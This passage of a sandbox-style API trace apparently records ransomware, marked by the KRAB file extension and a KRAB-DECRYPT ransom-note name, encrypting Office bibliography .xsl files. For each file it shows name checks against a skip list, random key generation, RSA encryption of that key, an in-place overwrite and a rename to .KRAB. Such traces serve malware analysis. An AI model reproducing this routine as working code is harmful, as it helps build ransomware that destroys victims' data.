lpNumberOfBytesRead=0x338e7fc*=0x3d639, lpOverlapped=0x0) returned 1 [0058.227] SetFilePointerEx (in: hFile=0x448, liDistanceToMove=0xfffc29c7, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0058.227] WriteFile (in: hFile=0x448, lpBuffer=0x3870000*, nNumberOfBytesToWrite=0x3d639, lpNumberOfBytesWritten=0x338e7f8, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesWritten=0x338e7f8*=0x3d639, lpOverlapped=0x0) returned 1 [0058.228] WriteFile (in: hFile=0x448, lpBuffer=0x2f30000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338e7f8, lpOverlapped=0x0 | out: lpBuffer=0x2f30000*, lpNumberOfBytesWritten=0x338e7f8*=0x208, lpOverlapped=0x0) returned 1 [0058.228] VirtualFree (lpAddress=0x35e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0058.233] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0058.234] CloseHandle (hObject=0x448) returned 1 [0058.241] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0058.241] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\GostTitle.XSL" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\bibliography\\style\\gosttitle.xsl"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\GostTitle.XSL.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\bibliography\\style\\gosttitle.xsl.krab")) returned 1 [0058.242] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0058.242] FindNextFileW (in: hFindFile=0xfbd8a0, lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 1 [0058.243] lstrcmpW (lpString1="HarvardAnglia2008OfficeOnline.xsl", lpString2=".") returned 1 [0058.243] lstrcmpW (lpString1="HarvardAnglia2008OfficeOnline.xsl", lpString2="..") returned 1 [0058.243] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\", lpString2="HarvardAnglia2008OfficeOnline.xsl" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\HarvardAnglia2008OfficeOnline.xsl") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\HarvardAnglia2008OfficeOnline.xsl" [0058.243] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0058.243] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\HarvardAnglia2008OfficeOnline.xsl.KRAB") returned 105 [0058.243] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\HarvardAnglia2008OfficeOnline.xsl") returned 100 [0058.243] lstrlenW (lpString=".xsl") returned 4 [0058.243] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0058.243] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".xsl ") returned 5 [0058.243] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0058.244] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\HarvardAnglia2008OfficeOnline.xsl") returned 100 [0058.244] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\HarvardAnglia2008OfficeOnline.xsl") returned 100 [0058.244] lstrcmpiW (lpString1="HarvardAnglia2008OfficeOnline.xsl", lpString2="desktop.ini") returned 1 [0058.244] lstrcmpiW (lpString1="HarvardAnglia2008OfficeOnline.xsl", lpString2="autorun.inf") returned 1 [0058.244] lstrcmpiW (lpString1="HarvardAnglia2008OfficeOnline.xsl", lpString2="ntuser.dat") returned -1 [0058.244] lstrcmpiW (lpString1="HarvardAnglia2008OfficeOnline.xsl", lpString2="iconcache.db") returned -1 [0058.244] lstrcmpiW (lpString1="HarvardAnglia2008OfficeOnline.xsl", lpString2="bootsect.bak") returned 1 [0058.244] lstrcmpiW (lpString1="HarvardAnglia2008OfficeOnline.xsl", lpString2="boot.ini") returned 1 [0058.244] lstrcmpiW (lpString1="HarvardAnglia2008OfficeOnline.xsl", lpString2="ntuser.dat.log") returned -1 [0058.244] lstrcmpiW (lpString1="HarvardAnglia2008OfficeOnline.xsl", lpString2="thumbs.db") returned -1 [0058.244] lstrcmpiW (lpString1="HarvardAnglia2008OfficeOnline.xsl", lpString2="KRAB-DECRYPT.html") returned -1 [0058.244] lstrcmpiW (lpString1="HarvardAnglia2008OfficeOnline.xsl", lpString2="KRAB-DECRYPT.txt") returned -1 [0058.244] lstrcmpiW (lpString1="HarvardAnglia2008OfficeOnline.xsl", lpString2="CRAB-DECRYPT.txt") returned 1 [0058.244] lstrcmpiW (lpString1="HarvardAnglia2008OfficeOnline.xsl", lpString2="ntldr") returned -1 [0058.244] lstrcmpiW (lpString1="HarvardAnglia2008OfficeOnline.xsl", lpString2="NTDETECT.COM") returned -1 [0058.244] lstrcmpiW (lpString1="HarvardAnglia2008OfficeOnline.xsl", lpString2="Bootfont.bin") returned 1 [0058.244] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0058.245] CryptAcquireContextW (in: phProv=0x338e734, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e734*=0xfbc100) returned 1 [0058.245] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2f40000 [0058.246] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0058.246] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0058.246] CryptGenRandom (in: hProv=0xfbc100, dwLen=0x20, pbBuffer=0x338e7cc | out: pbBuffer=0x338e7cc) returned 1 [0058.246] CryptReleaseContext (hProv=0xfbc100, dwFlags=0x0) returned 1 [0058.246] VirtualFree (lpAddress=0x2f40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0058.246] CryptAcquireContextW (in: phProv=0x338e734, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e734*=0xfbc100) returned 1 [0058.247] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2f40000 [0058.250] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0058.250] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0058.250] CryptGenRandom (in: hProv=0xfbc100, dwLen=0x8, pbBuffer=0x338e7ec | out: pbBuffer=0x338e7ec) returned 1 [0058.250] CryptReleaseContext (hProv=0xfbc100, dwFlags=0x0) returned 1 [0058.250] VirtualFree (lpAddress=0x2f40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0058.251] CryptAcquireContextW (in: phProv=0x338e72c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e72c*=0xfbb220) returned 1 [0058.251] CryptImportKey (in: hProv=0xfbb220, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e730 | out: phKey=0x338e730*=0xfbd960) returned 1 [0058.251] CryptGetKeyParam (in: hKey=0xfbd960, dwParam=0x8, pbData=0x338e724, pdwDataLen=0x338e728, dwFlags=0x0 | out: pbData=0x338e724*=0x800, pdwDataLen=0x338e728*=0x4) returned 1 [0058.251] CryptEncrypt (in: hKey=0xfbd960, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30000*, pdwDataLen=0x338e75c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30000*, pdwDataLen=0x338e75c*=0x100) returned 1 [0058.251] GetLastError () returned 0x0 [0058.252] CryptDestroyKey (hKey=0xfbd960) returned 1 [0058.252] CryptReleaseContext (hProv=0xfbb220, dwFlags=0x0) returned 1 [0058.252] CryptAcquireContextW (in: phProv=0x338e72c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e72c*=0xfbb550) returned 1 [0058.252] CryptImportKey (in: hProv=0xfbb550, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e730 | out: phKey=0x338e730*=0xfbd4e0) returned 1 [0058.252] CryptGetKeyParam (in: hKey=0xfbd4e0, dwParam=0x8, pbData=0x338e724, pdwDataLen=0x338e728, dwFlags=0x0 | out: pbData=0x338e724*=0x800, pdwDataLen=0x338e728*=0x4) returned 1 [0058.252] CryptEncrypt (in: hKey=0xfbd4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30100*, pdwDataLen=0x338e75c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30100*, pdwDataLen=0x338e75c*=0x100) returned 1 [0058.253] GetLastError () returned 0x0 [0058.253] CryptDestroyKey (hKey=0xfbd4e0) returned 1 [0058.253] CryptReleaseContext (hProv=0xfbb550, dwFlags=0x0) returned 1 [0058.253] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\HarvardAnglia2008OfficeOnline.xsl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\bibliography\\style\\harvardanglia2008officeonline.xsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x448 [0058.255] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x35e0000 [0058.255] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0058.255] ReadFile (in: hFile=0x448, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338e7fc, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338e7fc*=0x45882, lpOverlapped=0x0) returned 1 [0058.310] SetFilePointerEx (in: hFile=0x448, liDistanceToMove=0xfffba77e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0058.310] WriteFile (in: hFile=0x448, lpBuffer=0x3870000*, nNumberOfBytesToWrite=0x45882, lpNumberOfBytesWritten=0x338e7f8, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesWritten=0x338e7f8*=0x45882, lpOverlapped=0x0) returned 1 [0058.311] WriteFile (in: hFile=0x448, lpBuffer=0x2f30000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338e7f8, lpOverlapped=0x0 | out: lpBuffer=0x2f30000*, lpNumberOfBytesWritten=0x338e7f8*=0x208, lpOverlapped=0x0) returned 1 [0058.311] VirtualFree (lpAddress=0x35e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0058.315] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0058.316] CloseHandle (hObject=0x448) returned 1 [0058.323] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0058.323] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\HarvardAnglia2008OfficeOnline.xsl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\bibliography\\style\\harvardanglia2008officeonline.xsl"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\HarvardAnglia2008OfficeOnline.xsl.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\bibliography\\style\\harvardanglia2008officeonline.xsl.krab")) returned 1 [0058.324] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0058.324] FindNextFileW (in: hFindFile=0xfbd8a0, lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 1 [0058.324] lstrcmpW (lpString1="IEEE2006OfficeOnline.xsl", lpString2=".") returned 1 [0058.324] lstrcmpW (lpString1="IEEE2006OfficeOnline.xsl", lpString2="..") returned 1 [0058.324] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\", lpString2="IEEE2006OfficeOnline.xsl" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\IEEE2006OfficeOnline.xsl") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\IEEE2006OfficeOnline.xsl" [0058.325] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0058.325] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\IEEE2006OfficeOnline.xsl.KRAB") returned 96 [0058.325] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\IEEE2006OfficeOnline.xsl") returned 91 [0058.325] lstrlenW (lpString=".xsl") returned 4 [0058.325] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0058.325] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".xsl ") returned 5 [0058.325] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0058.326] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\IEEE2006OfficeOnline.xsl") returned 91 [0058.326] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\IEEE2006OfficeOnline.xsl") returned 91 [0058.326] lstrcmpiW (lpString1="IEEE2006OfficeOnline.xsl", lpString2="desktop.ini") returned 1 [0058.326] lstrcmpiW (lpString1="IEEE2006OfficeOnline.xsl", lpString2="autorun.inf") returned 1 [0058.326] lstrcmpiW (lpString1="IEEE2006OfficeOnline.xsl", lpString2="ntuser.dat") returned -1 [0058.326] lstrcmpiW (lpString1="IEEE2006OfficeOnline.xsl", lpString2="iconcache.db") returned 1 [0058.326] lstrcmpiW (lpString1="IEEE2006OfficeOnline.xsl", lpString2="bootsect.bak") returned 1 [0058.326] lstrcmpiW (lpString1="IEEE2006OfficeOnline.xsl", lpString2="boot.ini") returned 1 [0058.326] lstrcmpiW (lpString1="IEEE2006OfficeOnline.xsl", lpString2="ntuser.dat.log") returned -1 [0058.326] lstrcmpiW (lpString1="IEEE2006OfficeOnline.xsl", lpString2="thumbs.db") returned -1 [0058.326] lstrcmpiW (lpString1="IEEE2006OfficeOnline.xsl", lpString2="KRAB-DECRYPT.html") returned -1 [0058.326] lstrcmpiW (lpString1="IEEE2006OfficeOnline.xsl", lpString2="KRAB-DECRYPT.txt") returned -1 [0058.326] lstrcmpiW (lpString1="IEEE2006OfficeOnline.xsl", lpString2="CRAB-DECRYPT.txt") returned 1 [0058.326] lstrcmpiW (lpString1="IEEE2006OfficeOnline.xsl", lpString2="ntldr") returned -1 [0058.326] lstrcmpiW (lpString1="IEEE2006OfficeOnline.xsl", lpString2="NTDETECT.COM") returned -1 [0058.326] lstrcmpiW (lpString1="IEEE2006OfficeOnline.xsl", lpString2="Bootfont.bin") returned 1 [0058.326] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0058.326] CryptAcquireContextW (in: phProv=0x338e734, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e734*=0xfbb198) returned 1 [0058.327] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2f40000 [0058.327] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0058.328] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0058.328] CryptGenRandom (in: hProv=0xfbb198, dwLen=0x20, pbBuffer=0x338e7cc | out: pbBuffer=0x338e7cc) returned 1 [0058.328] CryptReleaseContext (hProv=0xfbb198, dwFlags=0x0) returned 1 [0058.328] VirtualFree (lpAddress=0x2f40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0058.328] CryptAcquireContextW (in: phProv=0x338e734, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e734*=0xfbc210) returned 1 [0058.328] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2f40000 [0058.329] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0058.329] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0058.329] CryptGenRandom (in: hProv=0xfbc210, dwLen=0x8, pbBuffer=0x338e7ec | out: pbBuffer=0x338e7ec) returned 1 [0058.329] CryptReleaseContext (hProv=0xfbc210, dwFlags=0x0) returned 1 [0058.329] VirtualFree (lpAddress=0x2f40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0058.329] CryptAcquireContextW (in: phProv=0x338e72c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e72c*=0xfbb7f8) returned 1 [0058.330] CryptImportKey (in: hProv=0xfbb7f8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e730 | out: phKey=0x338e730*=0xfbd460) returned 1 [0058.330] CryptGetKeyParam (in: hKey=0xfbd460, dwParam=0x8, pbData=0x338e724, pdwDataLen=0x338e728, dwFlags=0x0 | out: pbData=0x338e724*=0x800, pdwDataLen=0x338e728*=0x4) returned 1 [0058.330] CryptEncrypt (in: hKey=0xfbd460, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30000*, pdwDataLen=0x338e75c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30000*, pdwDataLen=0x338e75c*=0x100) returned 1 [0058.330] GetLastError () returned 0x0 [0058.330] CryptDestroyKey (hKey=0xfbd460) returned 1 [0058.330] CryptReleaseContext (hProv=0xfbb7f8, dwFlags=0x0) returned 1 [0058.331] CryptAcquireContextW (in: phProv=0x338e72c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e72c*=0xfbb220) returned 1 [0058.331] CryptImportKey (in: hProv=0xfbb220, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e730 | out: phKey=0x338e730*=0xfbd1a0) returned 1 [0058.331] CryptGetKeyParam (in: hKey=0xfbd1a0, dwParam=0x8, pbData=0x338e724, pdwDataLen=0x338e728, dwFlags=0x0 | out: pbData=0x338e724*=0x800, pdwDataLen=0x338e728*=0x4) returned 1 [0058.331] CryptEncrypt (in: hKey=0xfbd1a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30100*, pdwDataLen=0x338e75c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30100*, pdwDataLen=0x338e75c*=0x100) returned 1 [0058.331] GetLastError () returned 0x0 [0058.331] CryptDestroyKey (hKey=0xfbd1a0) returned 1 [0058.332] CryptReleaseContext (hProv=0xfbb220, dwFlags=0x0) returned 1 [0058.332] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\IEEE2006OfficeOnline.xsl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\bibliography\\style\\ieee2006officeonline.xsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x448 [0058.332] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x35e0000 [0058.332] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0058.333] ReadFile (in: hFile=0x448, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338e7fc, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338e7fc*=0x47e7d, lpOverlapped=0x0) returned 1 [0058.377] SetFilePointerEx (in: hFile=0x448, liDistanceToMove=0xfffb8183, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0058.377] WriteFile (in: hFile=0x448, lpBuffer=0x3870000*, nNumberOfBytesToWrite=0x47e7d, lpNumberOfBytesWritten=0x338e7f8, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesWritten=0x338e7f8*=0x47e7d, lpOverlapped=0x0) returned 1 [0058.377] WriteFile (in: hFile=0x448, lpBuffer=0x2f30000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338e7f8, lpOverlapped=0x0 | out: lpBuffer=0x2f30000*, lpNumberOfBytesWritten=0x338e7f8*=0x208, lpOverlapped=0x0) returned 1 [0058.378] VirtualFree (lpAddress=0x35e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0058.382] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0058.383] CloseHandle (hObject=0x448) returned 1 [0058.461] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0058.462] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\IEEE2006OfficeOnline.xsl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\bibliography\\style\\ieee2006officeonline.xsl"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\IEEE2006OfficeOnline.xsl.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\bibliography\\style\\ieee2006officeonline.xsl.krab")) returned 1 [0058.462] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0058.463] FindNextFileW (in: hFindFile=0xfbd8a0, lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 1 [0058.463] lstrcmpW (lpString1="ISO690.XSL", lpString2=".") returned 1 [0058.463] lstrcmpW (lpString1="ISO690.XSL", lpString2="..") returned 1 [0058.463] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\", lpString2="ISO690.XSL" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\ISO690.XSL") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\ISO690.XSL" [0058.463] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0058.463] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\ISO690.XSL.KRAB") returned 82 [0058.463] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\ISO690.XSL") returned 77 [0058.463] lstrlenW (lpString=".XSL") returned 4 [0058.463] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0058.463] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".XSL ") returned 5 [0058.464] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0058.464] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\ISO690.XSL") returned 77 [0058.464] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\ISO690.XSL") returned 77 [0058.464] lstrcmpiW (lpString1="ISO690.XSL", lpString2="desktop.ini") returned 1 [0058.464] lstrcmpiW (lpString1="ISO690.XSL", lpString2="autorun.inf") returned 1 [0058.464] lstrcmpiW (lpString1="ISO690.XSL", lpString2="ntuser.dat") returned -1 [0058.464] lstrcmpiW (lpString1="ISO690.XSL", lpString2="iconcache.db") returned 1 [0058.464] lstrcmpiW (lpString1="ISO690.XSL", lpString2="bootsect.bak") returned 1 [0058.464] lstrcmpiW (lpString1="ISO690.XSL", lpString2="boot.ini") returned 1 [0058.464] lstrcmpiW (lpString1="ISO690.XSL", lpString2="ntuser.dat.log") returned -1 [0058.464] lstrcmpiW (lpString1="ISO690.XSL", lpString2="thumbs.db") returned -1 [0058.464] lstrcmpiW (lpString1="ISO690.XSL", lpString2="KRAB-DECRYPT.html") returned -1 [0058.464] lstrcmpiW (lpString1="ISO690.XSL", lpString2="KRAB-DECRYPT.txt") returned -1 [0058.464] lstrcmpiW (lpString1="ISO690.XSL", lpString2="CRAB-DECRYPT.txt") returned 1 [0058.465] lstrcmpiW (lpString1="ISO690.XSL", lpString2="ntldr") returned -1 [0058.465] lstrcmpiW (lpString1="ISO690.XSL", lpString2="NTDETECT.COM") returned -1 [0058.465] lstrcmpiW (lpString1="ISO690.XSL", lpString2="Bootfont.bin") returned 1 [0058.465] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0058.465] CryptAcquireContextW (in: phProv=0x338e734, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e734*=0xfbc100) returned 1 [0058.465] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2f40000 [0058.466] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0058.466] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0058.466] CryptGenRandom (in: hProv=0xfbc100, dwLen=0x20, pbBuffer=0x338e7cc | out: pbBuffer=0x338e7cc) returned 1 [0058.466] CryptReleaseContext (hProv=0xfbc100, dwFlags=0x0) returned 1 [0058.466] VirtualFree (lpAddress=0x2f40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0058.466] CryptAcquireContextW (in: phProv=0x338e734, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e734*=0xfbb880) returned 1 [0058.467] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2f40000 [0058.467] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0058.467] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0058.467] CryptGenRandom (in: hProv=0xfbb880, dwLen=0x8, pbBuffer=0x338e7ec | out: pbBuffer=0x338e7ec) returned 1 [0058.467] CryptReleaseContext (hProv=0xfbb880, dwFlags=0x0) returned 1 [0058.468] VirtualFree (lpAddress=0x2f40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0058.468] CryptAcquireContextW (in: phProv=0x338e72c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e72c*=0xfbc100) returned 1 [0058.468] CryptImportKey (in: hProv=0xfbc100, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e730 | out: phKey=0x338e730*=0xfbd460) returned 1 [0058.468] CryptGetKeyParam (in: hKey=0xfbd460, dwParam=0x8, pbData=0x338e724, pdwDataLen=0x338e728, dwFlags=0x0 | out: pbData=0x338e724*=0x800, pdwDataLen=0x338e728*=0x4) returned 1 [0058.468] CryptEncrypt (in: hKey=0xfbd460, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30000*, pdwDataLen=0x338e75c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30000*, pdwDataLen=0x338e75c*=0x100) returned 1 [0058.469] GetLastError () returned 0x0 [0058.469] CryptDestroyKey (hKey=0xfbd460) returned 1 [0058.469] 